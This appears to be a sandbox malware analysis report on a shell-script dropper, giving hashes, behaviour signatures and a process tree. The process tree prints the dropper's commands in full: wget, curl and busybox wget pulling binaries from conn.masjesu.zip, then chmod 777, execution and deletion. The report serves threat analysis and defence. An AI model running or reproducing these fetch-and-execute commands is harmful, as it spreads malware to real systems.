Analysis
-
max time kernel
146s -
max time network
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
-
Size
10KB
-
MD5
4ea5706fdd75f148d2bf38bc0ca8bf54
-
SHA1
57a2af30643d8facb455bb90086386308bdbb582
-
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
-
SHA512
a5c858e9af5b42bd2697b799f540c3b6530a4ec5380ce173d60ec5beca09f09415ee0d614f4aa71a45fc2bb557c8293c214856b055e07317d64045d5959448f3
-
SSDEEP
96:YmWF4N4N4fw0n3LiLBoBkBoiYo75v5D5oP3uZLCaLsLJ6JyJDyunue0EQEMEQddm:yW8Q137Qdd3Ak8YHqa437Qddv8YHqa56
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 888 chmod 809 chmod 832 chmod 867 chmod 916 chmod 924 chmod 740 chmod 794 chmod 881 chmod 909 chmod 765 chmod 856 chmod 874 chmod 895 chmod 902 chmod 931 chmod 725 chmod 733 chmod 816 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 726 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 734 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 741 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 767 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 796 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 810 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 817 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 833 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 858 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 868 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 875 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 882 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 889 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 896 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 903 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 910 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 917 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 925 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 932 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 52 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 753 curl 815 busybox 878 curl 892 curl 866 busybox 885 curl 894 busybox 906 curl 736 wget 788 busybox 808 busybox 864 curl 870 wget 905 wget 921 curl 737 curl 800 wget 819 wget 828 busybox 813 curl 862 wget 877 wget 880 busybox 710 curl 730 curl 732 busybox 812 wget 927 wget 899 curl 908 busybox 920 wget 934 wget 723 busybox 763 busybox 776 curl 873 busybox 901 busybox 746 wget 771 wget 871 curl 887 busybox 928 curl 930 busybox 805 curl 820 curl 884 wget 898 wget 923 busybox 703 wget 729 wget 739 busybox 891 wget -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl
Processes
-
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh1⤵PID:693
-
/bin/rm/bin/rm bins.sh2⤵PID:698
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:723
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:728
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:729
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:735
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:771
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:799
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:853
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:915
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:934
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97